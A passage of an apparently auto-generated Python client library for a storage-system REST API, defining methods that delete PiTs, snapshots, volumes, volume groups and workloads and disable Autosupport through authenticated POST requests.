        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_pit(self, system_id, body, **kwargs):
    """
    Delete one or more PiTs.

    Documented return codes: ok, rollbackInProgress, invalidPitRef,
    notOldestPit, pitInConsistencyGroup.

    The request is synchronous by default; pass a `callback` keyword
    argument to run it asynchronously, in which case the request thread
    is returned and the callback is invoked with the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param PITRefList body: Structure containing a list of PiTs. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :param callback: Optional function invoked with the response.
    :return: str, or the request thread when called asynchronously.
    :raises: ValueError if a required parameter is missing or the
        response format is unknown; TypeError on an unexpected keyword
        argument or response type; ApiException on HTTP errors (422+).
    """
    accepted = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    # Reject unknown keyword arguments before doing anything else.
    for arg_name in kwargs:
        if arg_name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_pit" % arg_name
            )
    # Both positional parameters are mandatory and may not be None.
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_pit`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_pit`")

    resource_path = '/storage-systems/{system-id}/symbol/deletePIT'
    path_params = {'system-id': system_id}

    # Optional query-string parameters (note the camelCase wire name).
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    # Negotiate JSON both ways; omit Accept when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_pit_consistency_group(self, system_id, body, **kwargs):
    """
    Delete an existing PiT consistency group.

    Deletes all of the child PiT groups and their PiTs and associated
    ERVs. All associated views are stopped.
    Documented return codes: ok.

    The request is synchronous by default; pass a `callback` keyword
    argument to run it asynchronously, in which case the request thread
    is returned and the callback is invoked with the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param PITConsistencyGroupDeletionDescriptor body: Descriptor for the consistency group to be deleted. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :param callback: Optional function invoked with the response.
    :return: str, or the request thread when called asynchronously.
    :raises: ValueError if a required parameter is missing or the
        response format is unknown; TypeError on an unexpected keyword
        argument or response type; ApiException on HTTP errors (422+).
    """
    accepted = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    # Reject unknown keyword arguments before doing anything else.
    for arg_name in kwargs:
        if arg_name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_pit_consistency_group" % arg_name
            )
    # Both positional parameters are mandatory and may not be None.
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_pit_consistency_group`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_pit_consistency_group`")

    resource_path = '/storage-systems/{system-id}/symbol/deletePITConsistencyGroup'
    path_params = {'system-id': system_id}

    # Optional query-string parameters (note the camelCase wire name).
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    # Negotiate JSON both ways; omit Accept when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_pit_consistency_group_view(self, system_id, body, **kwargs):
    """
    This procedure will delete the specified PITConsistencyGroupView.
    Documented return codes: ok, operationFailedVolumeCopyClone.
    The request is synchronous by default. Supplying a `callback` keyword
    argument makes it asynchronous: the callback receives the response and
    the request thread is returned instead of the result.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.symbol_delete_pit_consistency_group_view(system_id, body, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param PITConsistencyGroupViewDeletionDescriptor body: An object containing all of the attributes required to delete a PiT Consistency Group View. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :return: str (or the request thread when called asynchronously)
    :raises: ValueError when a required parameter is missing or the response
        data format is unknown; TypeError when the response data type is
        unexpected; ApiException on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not define.
    accepted = ('system_id', 'body', 'controller',
                'verbose_error_response', 'callback')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_pit_consistency_group_view" % key
            )
    params = dict(kwargs, system_id=system_id, body=body)
    # Both positional parameters are mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_pit_consistency_group_view`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_pit_consistency_group_view`")
    resource_path = '/storage-systems/{system-id}/symbol/deletePITConsistencyGroupView'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate JSON for both the request body and the response.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params['body'],
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_delete_pit_group(self, system_id, body, **kwargs):
    """
    This procedure will delete a PiT Group.
    Documented return codes: ok, rollbackInProgress, invalidPitGroupRef, pitGroupInConsistencyGroup, operationFailedVolumeCopyClone.
    The request is synchronous by default. Supplying a `callback` keyword
    argument makes it asynchronous: the callback receives the response and
    the request thread is returned instead of the result.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.symbol_delete_pit_group(system_id, body, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param PITGroupDeletionDescriptor body: Structure containing PiT group reference data. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :return: str (or the request thread when called asynchronously)
    :raises: ValueError when a required parameter is missing or the response
        data format is unknown; TypeError when the response data type is
        unexpected; ApiException on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not define.
    accepted = ('system_id', 'body', 'controller',
                'verbose_error_response', 'callback')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_pit_group" % key
            )
    params = dict(kwargs, system_id=system_id, body=body)
    # Both positional parameters are mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_pit_group`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_pit_group`")
    resource_path = '/storage-systems/{system-id}/symbol/deletePITGroup'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate JSON for both the request body and the response.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params['body'],
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_delete_pit_view(self, system_id, body, **kwargs):
    """
    This procedure will delete an existing PiT View.
    Documented return codes: ok, operationFailedVolumeCopyClone.
    The request is synchronous by default. Supplying a `callback` keyword
    argument makes it asynchronous: the callback receives the response and
    the request thread is returned instead of the result.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.symbol_delete_pit_view(system_id, body, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param PITViewDeletionDescriptor body: Structure containing information about the PiT View to delete. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :return: str (or the request thread when called asynchronously)
    :raises: ValueError when a required parameter is missing or the response
        data format is unknown; TypeError when the response data type is
        unexpected; ApiException on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not define.
    accepted = ('system_id', 'body', 'controller',
                'verbose_error_response', 'callback')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_pit_view" % key
            )
    params = dict(kwargs, system_id=system_id, body=body)
    # Both positional parameters are mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_pit_view`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_pit_view`")
    resource_path = '/storage-systems/{system-id}/symbol/deletePITView'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate JSON for both the request body and the response.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params['body'],
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_delete_sa_port_group(self, system_id, body, **kwargs):
    """
    Removes all SAPorts from an SAPortGroup, and deletes the group. OBSOLETE: Any call to deleteSAPortGroup will get a return status indicating the command is obsolete. No alternative procedure is available.
    Documented return codes: ok.
    The request is synchronous by default. Supplying a `callback` keyword
    argument makes it asynchronous: the callback receives the response and
    the request thread is returned instead of the result.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.symbol_delete_sa_port_group(system_id, body, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :return: str (or the request thread when called asynchronously)
    :raises: ValueError when a required parameter is missing or the response
        data format is unknown; TypeError when the response data type is
        unexpected; ApiException on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not define.
    accepted = ('system_id', 'body', 'controller',
                'verbose_error_response', 'callback')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_sa_port_group" % key
            )
    params = dict(kwargs, system_id=system_id, body=body)
    # Both positional parameters are mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_sa_port_group`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_sa_port_group`")
    resource_path = '/storage-systems/{system-id}/symbol/deleteSAPortGroup'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate JSON for both the request body and the response.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params['body'],
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_delete_schedule_list(self, system_id, body, **kwargs):
    """
    This procedure will delete a list of schedules.
    Documented return codes: ok.
    The request is synchronous by default. Supplying a `callback` keyword
    argument makes it asynchronous: the callback receives the response and
    the request thread is returned instead of the result.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.symbol_delete_schedule_list(system_id, body, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param ScheduleRefList body: A list of schedule references. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :return: str (or the request thread when called asynchronously)
    :raises: ValueError when a required parameter is missing or the response
        data format is unknown; TypeError when the response data type is
        unexpected; ApiException on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not define.
    accepted = ('system_id', 'body', 'controller',
                'verbose_error_response', 'callback')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_schedule_list" % key
            )
    params = dict(kwargs, system_id=system_id, body=body)
    # Both positional parameters are mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_schedule_list`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_schedule_list`")
    resource_path = '/storage-systems/{system-id}/symbol/deleteScheduleList'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate JSON for both the request body and the response.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params['body'],
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_delete_snapshot(self, system_id, body, **kwargs):
    """
    Deletes the snapshot volume identified by the input argument. All data on the volume is lost and all resources associated with maintaining the snapshot are released.
    Documented return codes: ok.
    The request is synchronous by default. Supplying a `callback` keyword
    argument makes it asynchronous: the callback receives the response and
    the request thread is returned instead of the result.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.symbol_delete_snapshot(system_id, body, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: A SYMbol reference to the snapshot volume that is to be deleted. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :return: str (or the request thread when called asynchronously)
    :raises: ValueError when a required parameter is missing or the response
        data format is unknown; TypeError when the response data type is
        unexpected; ApiException on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not define.
    accepted = ('system_id', 'body', 'controller',
                'verbose_error_response', 'callback')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_snapshot" % key
            )
    params = dict(kwargs, system_id=system_id, body=body)
    # Both positional parameters are mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_snapshot`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_snapshot`")
    resource_path = '/storage-systems/{system-id}/symbol/deleteSnapshot'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate JSON for both the request body and the response.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params['body'],
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_delete_volume(self, system_id, body, **kwargs):
    """
    This procedure is used to delete a Thin Volume. The procedure has been deprecated for deleting RAID Volumes - it has been replaced by the procedure deleteVolumeFromGroup.
    Documented return codes: ok, illegalParam, noHeap, volumeReconfiguring, reservationConflict, internalError, volumeFormatting, invalidVolumeref, volumeOffline, repositoryOffline, repositoryReconfiguring, rollbackInProgress, repositoryMissing, volumeHasMirrorRelationship, volumeInUse.
    The request is synchronous by default. Supplying a `callback` keyword
    argument makes it asynchronous: the callback receives the response and
    the request thread is returned instead of the result.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.symbol_delete_volume(system_id, body, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: The value of the AbstractVolRef for the volume to be deleted. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :return: str (or the request thread when called asynchronously)
    :raises: ValueError when a required parameter is missing or the response
        data format is unknown; TypeError when the response data type is
        unexpected; ApiException on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not define.
    accepted = ('system_id', 'body', 'controller',
                'verbose_error_response', 'callback')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_volume" % key
            )
    params = dict(kwargs, system_id=system_id, body=body)
    # Both positional parameters are mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_volume`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_volume`")
    resource_path = '/storage-systems/{system-id}/symbol/deleteVolume'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate JSON for both the request body and the response.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params['body'],
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_delete_volume_from_group(self, system_id, body, **kwargs):
    """
    This procedure deletes the volume referenced by the input argument. The procedure allows the caller to specify which behavior is desired for the case of deleting the last volume in the volume group - either delete or retain the volume group.
    Documented return codes: ok.
    The request is synchronous by default. Supplying a `callback` keyword
    argument makes it asynchronous: the callback receives the response and
    the request thread is returned instead of the result.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.symbol_delete_volume_from_group(system_id, body, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param VolumeDeletionDescriptor body: A VolumeDeletionDescriptor which contains (1) a reference to the volume to delete and (2) a boolean indicator, which indicates whether to delete or retain the volume group when the last volume in the group is deleted. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :return: str (or the request thread when called asynchronously)
    :raises: ValueError when a required parameter is missing or the response
        data format is unknown; TypeError when the response data type is
        unexpected; ApiException on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not define.
    accepted = ('system_id', 'body', 'controller',
                'verbose_error_response', 'callback')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_volume_from_group" % key
            )
    params = dict(kwargs, system_id=system_id, body=body)
    # Both positional parameters are mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_volume_from_group`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_volume_from_group`")
    resource_path = '/storage-systems/{system-id}/symbol/deleteVolumeFromGroup'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate JSON for both the request body and the response.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params['body'],
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_delete_volume_group(self, system_id, body, **kwargs):
    """
    Delete VolumeGroup and all Volumes in that group
    Documented return codes: ok, volumeInUse.
    The request is synchronous by default. Supplying a `callback` keyword
    argument makes it asynchronous: the callback receives the response and
    the request thread is returned instead of the result.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.symbol_delete_volume_group(system_id, body, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: A reference to the volume group that is to be deleted. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :return: str (or the request thread when called asynchronously)
    :raises: ValueError when a required parameter is missing or the response
        data format is unknown; TypeError when the response data type is
        unexpected; ApiException on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not define.
    accepted = ('system_id', 'body', 'controller',
                'verbose_error_response', 'callback')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_volume_group" % key
            )
    params = dict(kwargs, system_id=system_id, body=body)
    # Both positional parameters are mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_volume_group`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_volume_group`")
    resource_path = '/storage-systems/{system-id}/symbol/deleteVolumeGroup'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate JSON for both the request body and the response.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params['body'],
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_delete_workload(self, system_id, body, **kwargs):
    """
    This procedure removes the specified application awareness workloads. It is not an error to remove in-use (association mapped) workloads. All association mappings for the workload are removed including any KeyValueTag mappings. The actual KeyValueTag records are not deleted.
    Documented return codes: ok.
    The request is synchronous by default. Supplying a `callback` keyword
    argument makes it asynchronous: the callback receives the response and
    the request thread is returned instead of the result.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.symbol_delete_workload(system_id, body, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param WorkloadRefList body: A list of SYMbol application awareness workload references. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :return: str (or the request thread when called asynchronously)
    :raises: ValueError when a required parameter is missing or the response
        data format is unknown; TypeError when the response data type is
        unexpected; ApiException on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not define.
    accepted = ('system_id', 'body', 'controller',
                'verbose_error_response', 'callback')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_workload" % key
            )
    params = dict(kwargs, system_id=system_id, body=body)
    # Both positional parameters are mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_workload`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_workload`")
    resource_path = '/storage-systems/{system-id}/symbol/deleteWorkload'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate JSON for both the request body and the response.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params['body'],
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_delete_workload_volume_mapping(self, system_id, body, **kwargs):
    """
    Delete the specified workload-to-volume mappings.
    Documented return codes: ok.

    Synchronous by default; pass a `callback` keyword argument (a callable
    that receives the response) to run asynchronously, in which case the
    request thread is returned instead of the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param WorkloadVolumeDeleteMappingDescriptorList body: Identifiers of the workload-to-volume mappings to delete. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: Request verbose error payloads (optional)
    :param callback: Callable invoked with the response for async requests (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing or the response data format is unknown.
    :raises TypeError: if the response data type differs from what is expected.
    :raises ApiException: on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    params = {'system_id': system_id, 'body': body}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_workload_volume_mapping" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_workload_volume_mapping`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_workload_volume_mapping`")
    resource_path = '/storage-systems/{system-id}/symbol/deleteWorkloadVolumeMapping'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    # Optional query parameters, translated to their wire names.
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate HTTP headers; omit Accept entirely when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_disable_asup(self, system_id, **kwargs):
    """
    Disable Autosupport on the target storage system.
    Documented return codes: ok, notImplemented.

    Synchronous by default; pass a `callback` keyword argument (a callable
    that receives the response) to run asynchronously, in which case the
    request thread is returned instead of the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: Request verbose error payloads (optional)
    :param callback: Callable invoked with the response for async requests (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing or the response data format is unknown.
    :raises TypeError: if the response data type differs from what is expected.
    :raises ApiException: on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('system_id', 'controller', 'verbose_error_response', 'callback')
    params = {'system_id': system_id}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_disable_asup" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_asup`")
    resource_path = '/storage-systems/{system-id}/symbol/disableASUP'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    # Optional query parameters, translated to their wire names.
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate HTTP headers; omit Accept entirely when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
